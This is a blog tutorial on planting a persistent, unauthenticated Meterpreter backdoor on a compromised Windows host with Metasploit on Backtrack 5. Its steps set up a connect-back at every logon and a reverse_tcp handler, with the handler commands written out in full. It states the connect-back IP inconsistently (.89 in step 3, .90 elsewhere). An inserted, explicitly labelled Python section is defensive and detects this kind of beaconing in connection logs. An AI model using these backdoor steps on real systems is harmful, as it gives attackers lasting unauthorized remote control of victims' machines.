5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5


Type: Tutorial

Level: Medium, Advanced

Some people and students ask what we should do after successfully compromising or exploiting a victim.

Some exploits, such as CVE-2010-3962, can make the victim's computer hang when executed. When the computer hangs, some users choose to restart it, and that makes the previous exploit ineffective: the session you had is gone.

What we will do here is maintain access, that is, leave yourself an easier way back into the system later. With this method, even if the service you exploited is down or patched, you can still gain access to the system for future use.

The Metasploit Persistent Meterpreter Service is what we will use in this tutorial, but be warned: the persistent Meterpreter as shown in this tutorial requires no authentication. This means that anyone who gains access to the port could use your backdoor. This is not a good thing if you are conducting a penetration test, as it could be a significant risk.

Requirements:

1. Backtrack 5 (or other Linux OS)

2. Metasploit Framework 3 (Included in Backtrack 5)

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5:

1. You need to set the payload of your exploit to Meterpreter for this method to work.


2. Run persistence -h to view the help list.


3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and then try to connect back to our listener every 5 seconds, at IP address 192.168.8.89 on port 8080.


Notice that the script output gives you the command to "remove" the persistent listener when you are done with it. Be sure to make a note of it so you don't leave an unauthenticated backdoor on the system.

Explanation:

-U : start the backdoor when a user logs in to the system

-i : try to connect back every 5 seconds (the reconnect interval)

-p : the port to connect back to, here port 8080

-r : the IP address to connect back to, here 192.168.8.90

4. To make sure that it works, reboot the remote system and set up our payload handler:

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.90
LHOST => 192.168.8.90
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.8.90:8080
[*] Starting the payload handler...

5. When the remote user restarts the system and logs in again, the output should look like this (we have to wait until the backdoor is executed on the remote system):

Let's see what happens on the remote user's side:

There is an established connection between the attacker and the remote host.
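The reconnect loop described above (a connect-back to one host and port at a fixed interval, starting at logon) is exactly the regularity a defender can look for in outbound connection logs. The following Python is added here as an example and is not part of the original tutorial; the log format, the internal hosts and the thresholds are assumptions, and the sample log is constructed.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log (assumed format: "<ISO time> <src> <dst> <dport>").
# 10.0.0.15 shows the 5-second reconnect pattern to the handler address used
# in the tutorial; 10.0.0.22 is ordinary, irregular web traffic to a
# documentation-range address.
SAMPLE_LOG = """\
2011-06-01T09:00:00 10.0.0.15 192.168.8.90 8080
2011-06-01T09:00:05 10.0.0.15 192.168.8.90 8080
2011-06-01T09:00:10 10.0.0.15 192.168.8.90 8080
2011-06-01T09:00:15 10.0.0.15 192.168.8.90 8080
2011-06-01T09:00:20 10.0.0.15 192.168.8.90 8080
2011-06-01T09:00:02 10.0.0.22 203.0.113.7 443
2011-06-01T09:00:41 10.0.0.22 203.0.113.7 443
2011-06-01T09:00:43 10.0.0.22 203.0.113.7 443
2011-06-01T09:01:07 10.0.0.22 203.0.113.7 443
2011-06-01T09:01:08 10.0.0.22 203.0.113.7 443
"""

def parse_log(text):
    """Group connection timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return flows

def find_beacons(flows, min_attempts=5, max_jitter=0.2, max_interval=60.0):
    """Return flows whose gaps between connections are short and nearly constant.

    max_jitter bounds stddev/mean of the gaps: user traffic is bursty and
    irregular, a scripted reconnect loop is not. Hosts with too few attempts
    or a long average gap are skipped.
    """
    findings = []
    for key, times in flows.items():
        if len(times) < min_attempts:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0 or avg > max_interval:
            continue
        if pstdev(gaps) / avg <= max_jitter:
            findings.append({"flow": key, "attempts": len(times), "interval_s": round(avg, 1)})
    return findings

if __name__ == "__main__":
    for finding in find_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```

Only the 10.0.0.15 flow is reported; in a real deployment the thresholds would be tuned against the site's own baseline and the check run over firewall or NetFlow exports rather than an inline string.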

Hope it’s useful 🙂


Blogger at hacking-tutorial.com. Website: http://www.vishnuvalentino.com